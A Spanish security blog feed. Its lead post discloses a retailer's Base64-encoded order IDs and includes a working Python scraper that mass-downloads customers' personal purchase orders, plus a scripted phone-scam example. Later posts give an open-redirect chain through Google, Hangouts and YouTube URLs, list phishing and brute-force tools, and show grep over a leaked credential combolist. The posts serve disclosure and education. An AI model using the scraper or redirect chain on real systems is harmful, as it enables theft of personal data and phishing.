Esta larga introducción es para mostrarles que Base64 NO es un método de encriptación. Comprando un producto a través de una página de telefonía, me encontré con que usaban como método de "seguridad" pasar el id de una orden de compra ~~encriptada~~ codificada a Base64, lo cual permitió una fuga generalizada de las órdenes de compra de esa empresa.

Aquí los dejo con el análisis de las vulnerabilidades:

Vulnerabilidades

Vulnerabilidad 1 - Obtención de todas las órdenes de compra

Una vez que se compra un producto en "empresa telefonía", se envía la orden de compra con un enlace con el siguiente formato:

https://empresatelefonia.cl/fullprice/certificadopdforden?id=NDAwMDAxOTgyNQ==

Como podemos notar el parámetro id recibe algo en Base64, si lo decodificamos nos damos cuenta que es exactamente el id de la compra:

NDAwMDAxOTgyNQ== → 4000019825

También podemos notar que la orden de compra es un número ascendente, que probablemente parte del 4000000000.

Para obtener todas la órdenes se crea un simple script en python que recorre las órdenes del 4000000000 al 4000200000 (empíricamente podemos notar que llegan hasta solo 4000019831 al momento de escribir este reporte), la orden se codifica a Base64 y se concatena con la URL que genera la orden de compra:

import threading
import time
import requests
import base64
import sys
import os

START_IN = 4000000000
STOP_IN = 4000020000
THREADS = 5
SAVE_PATH = './orders'

class ThreadFunction(threading.Thread):
    def run(self):
        global START_IN
        while True:
            START_IN +=1
            if START_IN > STOP_IN:
                break
            order_number = str(START_IN)
            b64_order_number = base64.b64encode(order_number.encode('ascii')).decode("utf-8")
            url_order = 'https://empresatelefonia.cl/fullprice/certificadopdforden?id={}'.format(b64_order_number)
            r = requests.get(url_order)
            print('[{}] \t {} -> order: {}'.format(r.status_code, url_order, START_IN))
            if r.status_code == 200:
                with open('{}/{}.pdf'.format(SAVE_PATH, order_number), 'wb') as f:
                    f.write(r.content)
            else:
                continue

def main():
    if not os.path.exists(SAVE_PATH):
        os.makedirs(SAVE_PATH)
    if len(sys.argv) >= 2:
        global THREADS
        THREADS = int(sys.argv[1])
    if len(sys.argv) >= 3:
        global START_IN
        START_IN = int(sys.argv[2])
    if len(sys.argv) >= 4:
        global STOP_IN
        STOP_IN = int(sys.argv[3])
    for x in range(threads):
        mythread = ThreadFunction(name = "Thread-{}".format(x + 1))
        mythread.start()

if __name__ == '__main__':
    main()

Modo de uso:

python3 ordenes.py <n° de threads> <n° primera orden> <n° última orden>

Con este script se puede obtener 19783 órdenes de compra (510 MBs):

Los datos obtenidos son privados y en su conjunto, sensibles:

Datos:

Nombre
Apellido
RUT
Mail
Teléfono
Dirección
Producto y precio de compra

Vulnerabilidad 2 - Sensitive Data Exposure

Si se induce un error en la URL anterior, obtenemos un error demasiado verboso:

https://empresatelefonia.cl/fullprice/certificadopdforden?id=jw==

Datos obtenidos:

Ruta completa de la aplicación
Framework de programación

Vulnerabilidad 3 - Confirmación de correo

En la misma línea se encontró que el enlace para confirmar el correo, también pasa los datos codificados en base64, por ende fácilmente decodificable:

https://empresatelefonia.cl/ValidacionMailAPP/Valida?token=cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw

cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw → rut=18999999-0&mail=pichon@gmail.com&entidad=5695&entidadid=106122940

Más allá de que es una mala práctica pasar datos personales por método GET, se puede crear un script que genere automáticamente el "token" de verificación de correo, bajo el supuesto de que el RUT y correo ya lo tenemos gracias a la vulnerabilidad anterior.

Vulnerabilidad 4 - Demasiada información sin seguridad

Con el siguiente enlace se puede obtener el seguimiento de una orden, lo que incluye el producto comprado.

https://empresatelefonia.cl/seguimiento-despacho/resultados/index/orden/4000019747

Esto quizás no parece una vulnerabilidad, pero se puede crear un script que vaya obteniendo los productos que vende la empresa en tiempo real, información muy útil para la competencia.

Vectores de ataque

Vector de ataque 1 - Interceptación física

Con la vulnerabilidad 1 y 4 se puede saber quién compra, dónde y cuándo va llegar el producto, por tanto un delincuente puede esperar a que llegue un repartidor para asaltarlo, ya que se sabe exactamente con que producto anda.

Vector de ataque 2 - Estafa telefónica

Delincuente: Aló

Víctima: Hola

Delincuente: Estimado Rodrigo Perez, lo llamamos de Empresa Telefonía ya que se compró un teléfono iPhone X el día de ayer. ¿Cierto?

Víctima: Si

Delincuente: Queremos decirle que el celular que le costó $1.039.000 estaba en oferta y se le cobró de más, el precio real era de $690.000. ¿Sería tan amable de darnos su tarjeta de crédito para abonarle la diferencia?

Víctima: Claro

Vector de ataque 3 - Cualquier tipo de ataque de ingeniería social

Dado que se tienen muchos datos personales, en manos de delincuentes estos datos serían propicios para cometer una infinidad de delitos de ingeniería social.

Mitigación

Siempre que se deba pasar datos sensibles a través de un enlace, este debe ser un token del id original.

Se define como token un string alfanumérico único lo suficientemente largo para que no sea adivinable y que no exista una función matemática lineal que dado un token se obtenga el id original.

Existen muchas funciones generadoras de hash como sha256, sha2, sha3, etc... Para que sea un token seguro se recomienda usar valores aleatorios y una combinación de funciones de hash.

Por tanto lo que se debe hacer es crear por cada orden un token y que los enlaces en la vulnerabilidad 1 y 4 reciban como parámetro ese token.

Ejemplo:

https://empresatelefonia.cl/fullprice/certificadopdforden?id=abfae0f14c8a4c6d08bb618bf1955086

https://empresatelefonia.cl/seguimiento-despacho/resultados/index/orden/abfae0f14c8a4c6d08bb618bf1955086

id_orden	token_orden	id_cliente	...
4000019747	abfae0f14c8a4c6d08bb618bf1955086	231	...
4000019748	0fe44a966488ed7987d0c760d0699365	532	...
...	...	...	...

Exactamente lo mismo se debe hacer en la vulnerabilidad 3, donde se debe generar un token único por usuario y pesarlo como parámetro el token del usuario y no los datos.

Base64 no sirve para cifrar datos ya que solo lo codifica, es decir, existe una función que puede revertir la codificación y obtener los datos originales.

Conclusión

Base64 NO es un método de encriptación.
La empresa involucrada se comportó muy profesionalmente, me llamaron en menos de 48 horas del reporte, y repararon absolutamente todas las vulnerabilidades en menos de una semana, y eso que eran complicadas de resolver ya que tenían que cambiar el modelo de la base de datos. Además contaban con un área de Cyber Seguridad y no como un banco que hablé en el pasado que trató el problema como un ticket de servicio al cliente. Felicitaciones!
Los datos obtenidos fueron con fines demostrativos y todas las órdenes obtenidas en el POC fueron eliminadas.

Bibliografía

Saludos ;)

Saltar la confirmación de redireccionamiento en Google y Youtube [Bypass Redirect Check Google / Youtube]

noreply@blogger.com (Leo Romero) — Mon, 13 May 2019 09:30:00 -0400

El uso de redirectores en páginas webs es relativamente normal, y sus usos principales son:

Avisar al usuario que está saliendo del dominio principal.
Recolectar datos de navegación de los usuarios.
Llevar al usuario a una página llena de publicidad para que hagas click en un entre que está entre dos banners de publicidad.

El caso 1 en general lo usan grandes sitios webs para evitar que nos redirijan a sitios webs maliciosos o con phishing sin previo aviso, como lo hace Google en este caso:

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.blackploit.com

Imagen 1: caso 1 de redireccionamiento

El caso número 2 es usado por grades plataformas para poder separar las operaciones con la analítica del sistema. El caso emblema es Twitter que usa su acortador t.co para redirigir todo el tráfico y poder analizar el comportamiento de sus usuarios, ejemplo:

http://t.co/J3LuvnLZ3X --> https://www.blackploit.com

Usar un acortador es la mejor forma de hacer un redirector ya que así te aseguras de que nadie pueda ingresar en la URL un parámetro malicioso, no como en el ejemplo del caso 2.

En el caso 3 existen muchos ejemplos de acortadores y redirectores que usan esta estrategia para obtener dinero por clicks en publicidad.

Imagen 2: ejemplo caso 3

Hoy nos vamos a centrar en el caso 1, específicamente en los redirectores de Google y Youtube, y ver que tan difícil es poder saltar la confirmación de redirección (imágen 1).

Potenciales usos maliciosos de un redirector

Existen diferentes formas de mal utilizar un redirector, algunas son:

Redirigir a una web con contenido malicioso o phishing, haciendo creer al usuario final que está en el dominio del redirector.
Ocultar el Referer original de un enlace.
Incrementar artificialmente las estadísticas de un sitio web.

En el caso 3 uno puede hacer un script que visite un enlace con redirector, y la página web objetivo va empezar a tener un incremento de visitas del sitio web del redirector, aumentando de forma artificial la fuente de tráfico en un sitio web.

Análisis

Google en su redirector principal, cada vez que haces click en un enlace del buscador, crea un redirector con la URL objetivo (en este ejemplo https://www.blackploit.com/) y crea 2 tokens (ved y usg) que cambian para evitar que cualquiera pueda aumentar de forma artificial los clicks (que son usados entre otras cosas para posicionar los resultados de búsquedas), en el caso de que los parámetros ved y usg no sean válidos, te mandarán a una página con un mensaje de redirección (imagen 1):

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&
ved=2ahUKEwiAkoTo8pbiAhUBA9QKHYSBAPkQFjAAegQIBhAC& 
url=https%3A%2F%2Fwww.blackploit.com%2F& 
usg=AOvVaw2YsoR0eglfSf7B9Vk2ZRzS

¿Cómo podemos predecir estos tokens?, No tengo la menor idea, pero no es necesario ya que Google tiene un whitelist de dominios que no requieren los tokens de verificación.

¿Cuáles son estos dominios?, Obviamente google.com y todos sus TLDs (google.es, cl, net, org, etc.) y todos sus subdominios, por tanto la regla es *.google.{com, cl, es, ... ,TLDs}.

Por ejemplo:

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&
url=https%3A%2F%2Fdrive.google.com

En este ejemplo nos redirige a drive.google.com sin mensajes de redireccionamiento.

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&
url=https%3A%2F%2Ffake.google.com

En este ejemplo nos redirige a fake.google.com sin mensajes de redireccionamiento, siendo que fake.google.com no existe, lo que confirma la regla vista anteriormente.

Por lo tanto debemos simplemente encontrar un solo redirector en *.google.com que no tenga reglas o mensajes de redireccionamiento y podemos saltar todos los redirectores de Google, es así como encontramos el redirector de Hangouts:

https://hangouts.google.com/linkredirect?dest=https%3A%2F%2Fwww.blackploit.com%2F

Este redirector simplemente nos envía a la URL que queramos sin mensajes ni avisos.

Por lo tanto ya tenemos todo lo que necesitamos, simplemente necesitamos codificar la URL paso a paso, donde se pueden ayudar de esta web.

Codificamos la web objetivo:

https://www.blackploit.com
 |
 v
https%3A%2F%2Fwww.blackploit.com

La agregamos al redirector de Hangouts y la volvemos a codificar:

https://hangouts.google.com/linkredirect?dest=https%3A%2F%2Fwww.blackploit.com
 |
 v
https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%253A%252F%252Fwww.blackploit.com

Por último la agregamos al redirector de Google:

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com

Listo! tenemos un enlace https://www.google.com/... que redirige a https://www.blackploit.com/ saltándose el filtro de Google.

Este mismo método se puede aplicar en otros redirectores, acá les mostraré dos ejemplos, uno en accounts.google.com y otro en accounts.youtube.com, ambos tienen el mismo comportamiento:

https://accounts.youtube.com/accounts/SetSID?ilo=1&ils=a4cc1b7ed445598%20f16cef403bb3b0311&ilc=0
&continue=https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com

https://accounts.google.com/signin/v2/identifier?uilel=3&service=youtube&passive=true&hl=es-419
&continue=https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com
&feature=sign_in_button&app=desktop&hl=es-419&next=%2F&flowName=GlifWebSignIn&flowEntry=ServiceLogin

Estos dos casos son más interesantes ya que cuando el usuario está logeado en una cuenta Google redirige a la web objetivo sin mostrar mensajes, en el caso de que no esté logeado en Google, le pide usuario y contraseña y luego lo redirige a la web objetivo sin problemas ni avisos.

Imágen 3: redirección cuando no estamos logeado en Google.

Resumen

(1)
https://hangouts.google.com/linkredirect?dest=https%3A%2F%2Fwww.blackploit.com

(2)
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15
&url=https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com

(3)
https://accounts.youtube.com/accounts/SetSID?ilo=1&ils=a4cc1b7ed445598%20f16cef403bb3b0311&ilc=0
&continue=https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com

(4)
https://accounts.google.com/signin/v2/identifier?uilel=3&service=youtube&passive=true&hl=es-419
&continue=https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com
&feature=sign_in_button&app=desktop&hl=es-419&next=%2F&flowName=GlifWebSignIn&flowEntry=ServiceLogin

Reporte

Se envió el reporte a Google y el bot que responde dijo que era un comportamiento completamente previsto y que incluso no era un defecto, si no, una característica.

Reporte a Google

Incluso mandan un enlace para informarnos más: https://sites.google.com/site/bughunteruniversity/nonvuln/open-redirect

En ese enlace dice claramente que en los redirectores se considera vulneravilidad:

Content Security Policy bypass
Referrer check bypass
URL whitelist bypass

Yo no sé si entiendo mal o el bot necesita un arreglo, pero ya se reportó y el bot tiene la última palabra.

Conclusión

Sin duda se pueden encontrar muchos más casos, aquí presento 3 que no me costó mucho trabajo en encontrar.

Puede parecer que esta no es una vulnerabilidad, pero se supone que cuando uno accede a un enlace de un dominio importante, este no debería redirigir a un sitio web malicioso.

Por otro lado existen redirectores que tienen en su whitelist de sitios de confianza a google.com, por lo cual esos redirectores también son bypasseables.

Personalmente ahora tengo más ojo y no me fio 100% de enlaces de Google.

[+] Salu2!

Las 20 herramientas de hacking más populares del 2018

noreply@blogger.com (Leo Romero) — Fri, 28 Dec 2018 10:11:00 -0300

En un ranking elaborado por Kitploit, nos muestran las 20 herramientas más populares (con más visitas) durante el 2018. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.

Destacan herramientas de Information Gathering, ingeniería social (phishing), OSINT, entre otras. De la lista la que más me gusta es ANDRAX (n° 10) que es una completa suite que corre en Android con un arsenal completo de herramientas que se pueden utilizar gracias a Termux, es como la versión de nuestro queridísimo Kali Linux pero para Android.

Sin más, los dejo con la lista:

EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search

Hijacker v1.5 - All-in-One Wi-Fi Cracking Tools for Android

LOIC 1.0.8 (Low Orbit Ion Cannon) - A network stress testing application

Trape - People tracker on the Internet (The evolution of phishing attacks) OSINT

BlackEye - The Most Complete Phishing Tool, With 32 Templates +1 Customizable

Mercury - A Hacking Tool Used To Collect Information And Use The Information To Further Hurt The Target

VOOKI - Web Application Vulnerability Scanner

Devploit v3.6 - Information Gathering Tool

Tinfoleak v2.4 - The Most Complete Open-Source Tool For Twitter Intelligence Analysis

ANDRAX - The First And Unique Penetration Testing Platform For Android Smartphones

SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)

Th3Inspector - Tool for Information Gathering

Pure Blood v2.0 - A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter

Kali Linux 2018.3 Release - Penetration Testing and Ethical Hacking Linux Distribution

Wifite 2.1.0 - Automated Wireless Attack Tool

Infection Monkey - An Automated Pentest Tool

Trackerjacker - Like Nmap For Mapping Wifi Networks You'Re Not Connected To, Plus Device Tracking

BadMod - Detect Website CMS, Website Scanner & Auto Exploiter

Photon - Incredibly Fast Crawler Which Extracts Urls, Emails, Files, Website Accounts And Much More

SocialFish - Ultimate phishing tool with Ngrok integrated

Fuente: https://kitploit.com

[+] Saludos y feliz año nuevo!!

0-Day en Windows permite la lectura de cualquier archivo sin privilegios

noreply@blogger.com (Leo Romero) — Thu, 20 Dec 2018 16:29:00 -0300

El investigador de seguridad SandboxEscaper ha publicado hoy el PoC para una nueva vulnerabilidad 0day que afecta a Windows que permite a un usuario con pocos privilegios o a un programa malicioso leer el contenido de cualquier archivo en un equipo con Windows, que de otro modo sólo sería posible con privilegios de administrador.

Según el investigador, debido a una validación incorrecta, se puede abusar de la función "MsiAdvertiseProduct" de Windows que se encarga de generar "un script publicitario para anunciar un producto y que permite al instalador escribir en un script la información de registro" forzando al servicio de instalación a hacer una copia de cualquier archivo con privilegios de SYSTEM y leer su contenido, lo que resulta en una vulnerabilidad de lectura arbitraria de archivos.

SandboxEscaper nos comparte un vídeo demostrativo donde podemos ver el funcionamiento de su exploit readfile.exe para leer un archivo con privilegios de SYSTEM:

Además de compartir el vídeo de demostración de la vulnerabilidad, SandboxEscaper también publicó su exploit en Github, pero debido a que Github hoy es de Microsoft, decidieron cerrar su cuenta sin mayores explicaciones.

Si desean descargar este exploit 0day (aún), lo pueden hacer con alguno de los enlaces que hay en el blog de SandboxEscaper, lamentablemente no está disponible en Github.

Fuentes:

Vídeos Presentaciones de Black Hat USA 2018

noreply@blogger.com (Leo Romero) — Mon, 19 Nov 2018 20:12:00 -0300

Este es su año 21° y ya han liberado los vídeos de las presentaciones:

Fuente: https://www.cyberhades.com

Cómo "hackearon" los correos del Congreso y Senado de Chile

noreply@blogger.com (Leo Romero) — Fri, 31 Aug 2018 18:48:00 -0300

Una vez más el grupo "TheShadowBrokers" genera alarma pública en Chile y esta vez se debe a que supuestamente "hackearon" los correos del Congreso y Senado de ese país.

Al hacer un análisis de los datos "hackeados" se nota rápidamente que son muy pocos los correos involucrados, por tanto no fue una intrusión a los servidores de correos del Congreso o Senado.

Como ya es común, los "TheShadowBrokers" solo recopilan datos, así que al buscar los correos en Have I Been Pwned, todos los correos había sido filtrados en otras ocasiones:

De estas filtraciones la más interesante es la de Exploit.in, ya que esta es una recopilación tipo combolist (email:contraseña) de muchas otras filtraciones, la particularidad es que todas las contraseñas están en texto plano (fueron crackeadas por algún ruso erudito en delitos informáticos). Esa base de datos está en la red y es cosa de buscarla, al comparar los datos de esa bases de datos con los "hackeados" por los "TheShadowBrokers", BINGO! son exactamente las mismas cuentas y contraseñas.

Por tanto lo único que tuvieron que hacer es:

grep -rnw '/ruta/a/Exploit.in_database/' -e 'congreso.cl'
grep -rnw '/ruta/a/Exploit.in_database/' -e 'senado.cl'

Así de simple, probablemente ni si quiera hayan servido para acceder a las cuentas reales, pero si para generar alarma pública.

Fuentes:

[+] Salu2

Presentaciones y Demos de la DEF CON 26 (2018)

noreply@blogger.com (Leo Romero) — Tue, 14 Aug 2018 10:35:00 -0300

Como ya es costumbre, se llevó a cabo del 9 al 12 de agosto del 2018 la DEF CON 26, conferencia que se destaca por llevar a los mejores exponentes mundiales y por ser una de las conferencias más renombradas en el mundo de la seguridad informática, hacking y pentest. Las presentaciones y demos las puedes descargar todas juntas en formato RAR, por torrent o individualmente:

Alexei Bulazel
- Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos
- Alexei-Bulazel-Reverse-Engineering-Windows-Defender.pdf
Alfonso Garcia and Alejo Murillo
- DEFCON-26-Alfonso-Garcia-and-Alejo-Murillo-Demo-Videos
- Alfonso-Garcia-and-Alejo-Murillo-Playback-a-TLS-story-Updated.pdf
Andrea Marcelli
- Andrea-Marcelli-Demo-Video.mp4
- Andrea-Marcelli-Looking-for-the-perfect-signature-automatic-YARA-rules.pdf
Bai Zheng and Chai Wang
- Bai-Zheng-Chai-Wang-You-May-Have-Paid-more-than-You-Imagine.pdf
Christopher Domas
- Christopher-Domas-GOD-MODE- UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf
- Christopher-Domas-The-Ring-0-Facade.pdf
DEFCON-26-Damien-Cauquil-Updated
- DEFCON-26-Damien-Cauquil-Extras
- DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos
- Damien-Cauquil-Secure-Your-BLE-Devices-Updated.pdf
Damien Cauquil
- DEFCON-26-Damien-Cauquil-Extras
- DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos
- Damien-Cauquil-Secure-Your-BLE-Devices.pdf
Dan Crowley - Mauro Paredes - Jen Savage - Updated
- Crowley-Paredes-Savage-Outsmarting-the-Smart-City-Demo-Video.mp4
- Crowley-Paredes-Savage-Outsmarting-the-Smart-City-Updated.pdf
Daniel Zolnikov
- Daniel-Zolnikov-Politics-and-the-Surveillence-State.pdf
David Melendez
- David-Melendez-Project-Interceptor-Demo-Video.mp4
- David-Melendez-Project-Interceptor-WP.pdf
- David-Melendez-Project-Interceptor.pdf
Dongsung Kim and Hyoung Kee Choi
- Dongsung-Kim-and-Hyoung-Kee-Choi-Demo-Video.mp4
- Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You.pdf
Dongsung Kim and Hyoung Kee Choi - Updated
- Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You-Demo-Video.mp4
- Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You-Updated.pdf
Douglas Mckee
- DEFCON-26-Douglas-McKee-Demo-Videos
- Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals.pdf
Douglas Mckee - Updated
- Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals-updated.pdf
- Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals-updated.pptx
Eric Sesterhenn
- DEFCON-26-Eric-Sesterhenn-Demo-Videos
  - Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You-PoC1.mp4
  - Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You-PoC2.mp4
- Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You.pdf
Feng Xiao - Jianwei Huang - Peng Liu
- Xiao-Huang-Liu-Hacking-the-Brain-Custom-Attack-SDN-Controller.pdf
- Huang-Liu-Hacking-the-Brain-Custom-Attack-SDN-Controller-Demo-Video.mp4
Gabriel Ryan
- DEFCON-26-Gabriel-Ryan-Demo-Videos
- Gabriel-Ryan-Owning-the-LAN-in-2018-WP.pdf
- Gabriel-Ryan-Owning-the-LAN-in-2018.pdf
Joe Rozner
- Joe-Rozner-Demo-Video.mp4
- Joe-Rozner-RE-Targetable-Grammer-Based-Test-Case-Generation-Synfuzz.pdf
John Seymour and Azeem Aqil
- DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos
- John-Seymour-and-Azeem-Aqil-Your-Voice-is-My-Passport.pdf
Josep Rodriguez
- Josep-Rodriguez-Breaking-Extreme-Networks-WingOS.pdf
- Josep-Rodriguez-Breaking-Extreme-Networks-WingOS-Demo-Video.mp4
L0pht Panel
- L0pht-Testimony-20-years-later.pdf
Leigh Anne Galloway and Tim Yunusov
- DEFCON-26-Galloway-and-Yunusov-Demo-Videos
- Galloway-and-Yunusov-For-the-love-of-money-Findingexploiting-vulns-in-mobile-pos-terminals.pdf
Louis Dion Marcil
- DEFCON-26-Louis-Dion-Marcil-Demo-Videos
  - demo1.mp4
  - demo2.mp4
- Louis-Dion-Marcil-Edge-Side-Include-Injection.pdf
Martin Vigo
- DEFCON-26-Martin-Vigo-Demo-Videos
- Martin-Vigo-Compromising-Online-Cracking-Voicemail-Systems.pdf
Michael West and Collin Campbell
- Micheal-West-Colin-Campbell-barcOwned-Popping-shells-with-your-cereal box.pdf
- Micheal-West-Colin-Campbell-barcOwned-Popping-shells-with-your-cereal box.pptx
Mickey Shkatov and Jesse Micheal
- DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-Demo-Videos
- Mickey-Shkatov-and-Jesse-Micheal-UEFI-Exploitation-For-The-Masses.pdf
Morgan Gangwere
- DEFCON-26-Morgan-Gangwere-Its-assembler-jim-Demo-Videos
- Morgan-Gangwere-Its-assembler-jim-Notes.pdf
- Morgan-Gangwere-Its-assembler-jim.pdf
Nafeez
- Nafeez-Compression-Oracle-attacks-on-VPN-Networks-openvpn3-voracle.gif
- Nafeez-Compression-Oracle-attacks-on-VPN-Networks.pdf
Nick Cano
- DEFCON-26-Nick-Cano-Demo-Videos
- Nick-Cano-Relocation-Bonus-Attacking-the-Win-Loader.pdf
Patrick Wardle
- Patrick-Wardle-Fire-and-Ice.pdf
- Patrick-Wardle-The-Mouse-Is-Mightier-Synthetic0Reality.pdf
Ruo Ando
- Ruo-Ando-Asura-Demo-Video.MP4
- Ruo-Ando-Asura-PCAP-File-Analyzer-for-Anomaly-Packet-Detection-Multithreading-WP.pdf
- Ruo-Ando-Asura-PCAP-File-Analyzer-for-Anomaly-Packet-Detection-Multithreading.pdf
Ryan Johnson and Angelos Stavrou
- DEFCON-26-Johnson-and-Stavrou-Demo-Videos
- Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-WP.pdf
- Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices.pdf
Ryan Johnson and Angelos Stavrou - Updated
- DEFCON-26-Johnson-and-Stavrou-Demo-Videos-Updated
- Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-Updated.pdf
- Johnson-and-Stavrou-Vulnerable-Out-of-the-Box-An-Eval-of-Android-Carrier-Devices-WP-Updated.pdf
Sanat Sharma
- Sanat-Sharma-House-of-Roman-Demo-Video.mp4
- Sanat-Sharma-House-of-Roman.pdf
Sheila A Berta and Sergio De Los Santos
- DEFCON-26-Sheila-A-Berta-and-Sergio-De-Los-Santos-Demo-Video
  - freetool.mp4
  - gmtruntime.mp4
- Sheila-A-Berta-and-Sergio-De-Los-Santos-Tracking-Android-Malware-Developers.pdf
Siegfried Rasthofer and Stephan Huber
- Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video
  - demovideo.mp4
  - greenalp-cast.mp4
- Siegfried-Rasthofer-and-Stephan-Huber-All-Your-Family-Secrets-Belong-to-Us.pdf
Siegfried Rasthofer and Stephan Huber - Updated
- Siegfried-Rasthofer-and-Stephan-Huber-Demo-Video-Updated
  - demovideo_Version2.mp4
  - greenalpdemo_Version2.mp4
- Siegfried-Rasthofer-and-Stephan-Huber-All-Your-Family-Secrets-Belong-to-Us-Updated.pdf
Silke Holtmanns and Isha Singh
- Holtmanns-Singh-4G-Who-is-Paying-your-cell-phone-bill.pdf
Slava Makkaveev
- DEFCON-26-Slava-Makkaveev-Demo-Videos
- Slava-Makkaveev-Man-In-The-Disk.pdf
Stark Riedesel and Parsia Hakimian
- DEFCON-26-Stark-Riedesel-and-Parsia-Hakimian-Demo-Videos
- Stark-Riedesel-and-Parsia-Hakimian-Tineola-Taking-Bite-Out-of-Enterprise-Blockchain.pdf
Thanh Bui and Siddharth Rao
- DEFCON-26-Thanh-Bui-and-Siddharth-Rao-Demo-Videos
  - 1password-demo.mp4
  - fido-demo.mp4
- Thanh-Bui-and-Siddharth-Rao-Last-Mile-Auth-Problem-Exploiting-End-to-End.pdf
The Tarquin
- DEFCON-26-The-Tarquin-Demo-Videos
- The-Tarquin-Weaponizing-Unicode-Homographs-Beyond-IDNs.pdf
Thiago Alves
- DEFCON-26-Thiago-Alves-Demo-Videos
- Thiago-Alves-Hacking-PLCs-and-Causing-Havoc-on-Critical-Infrastructures.pdf
Torani - Buchwald - Nirenberg
- Torani-Buchwald-Nirenberg-Reverse-Engineering-Hacker-Docu-Series-Sample-Scene.mp4
- Torani-Buchwald-Nirenberg-Reverse-Engineering-Hacker-Docu-Series.pdf
Truman Kain
- Truman-Kain-Demo-Video.mp4
- Truman-Kain-Dragnet-Social-Engineering-Sidekick.pdf
Truman Kain - Updated
- Truman-Kain-Demo-Video-Updated.mp4
- Truman-Kain-Dragnet-Social-Engineering-Sidekick-Updated.pdf
Vincent Tan
- DEFCON-26-Vincent-Tan-Demo-Videos
  - Vincent-Tan-Hacking-BLE-Bicycle-Locks-Demo-Video-1.mp4
  - Vincent-Tan-Hacking-BLE-Bicycle-Locks-Demo-Video-2.mp4
- Vincent-Tan-Hacking-BLE-Bicycle-Locks.pdf
Wesley McGrew
- Wesley-McGrew-An-Attacker-Looks-at-Docker-Demo-Video.mp4
- Wesley-McGrew-An-Attacker-Looks-at-Docker-WP.pdf
- Wesley-McGrew-An-Attacker-Looks-at-Docker.pdf
William Martin
- William-Martin-SMBetray-Backdooring-and-Breaking-Signiatures.pdf
- William-Martin-SMBetray-Demo-Video.mp4
Wu HuiYu and Qian Wenxiang
- DEFCON-26-Wu-HuiYu-and-Qian-Wenxiang-Demo-Videos
- Wu-HuiYu-and-Qian-Wenxiang-Breaking-Smart-Speakers.pdf
Xiaolong Bai and Min Zheng
- DEFCON-26-Xiaolong-Bai-and-Min-Zheng-Demo-Video
  - DemoOnPage13.mp4
  - DemoOnPage78.mp4
- Xiaolong-Bai-and-Min-Zheng-One-Bite-And-All-Your-Dreams-Will-Come-True.pdf
Zach Miller and Alex Kissinger
- DEFCON-26-Zach-Miller-and-Alex-Kissinger-Demo-Videos
- Zach-Miller-and-Alex-Kissinger-Infecting-Embedded-Supply-Chain.pdf
Zach Miller and Alex Kissinger - Updated
- Zach Miller and Alex Kissinger - Extras
  - demo3_mlwar_v2.ogv
  - demo4_brute_force_and_dump_fw.mp4
- Zach-Miller-and-Alex-Kissinger-Infecting-Embedded-Supply-Chain-Updated.pdf
nevermoe
- nevermoe-One-Step-Before-Game-Hackers-Andriod-Emulators-cheat-Demo-Video.mp4
- nevermoe-One-Step-Before-Game-Hackers-Andriod-Emulators.pdf
sghctoma
- DEFCON-26-sghctoma-Demo-Videos
- sghctoma-all-your-math-are-belong-to-us.pdf
singe
- singe-Practical-and-Improved-Wifi-MitM-with-Mana-eap-relay-v1.mp4
- singe-Practical-and-Improved-Wifi-MitM-with-Mana.pdf
smea
- DEFCON-26-smea-Jailbreaking-the-3DS-Demo-Videos
- smea-Jailbreaking-the-3DS.pdf
Alex-Levinson-Overview-of-Genesis-Scripting-Engine.pdf
Alexandre-Borges-Ring-02-Rootkits-bypassing-defenses-Updated.pdf
